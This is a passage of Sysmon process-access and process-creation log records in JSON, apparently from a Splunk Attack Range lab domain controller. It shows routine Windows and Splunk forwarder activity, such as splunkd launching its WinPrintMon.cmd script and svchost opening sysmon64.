C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-00107FFA0300}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-00107FFA0300}","TargetProcessId":"3484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.799\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-0010FBFD0300}\r\nProcessId: 3988\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.799","ProcessGuid":"{A837DB8D-01CA-5F25-0000-0010FBFD0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FBFD0300}\r\nTargetProcessId: 3988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FBFD0300}","TargetProcessId":"3988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010FBFD0300}\r\nTargetProcessId: 3988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FBFD0300}","TargetProcessId":"3988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|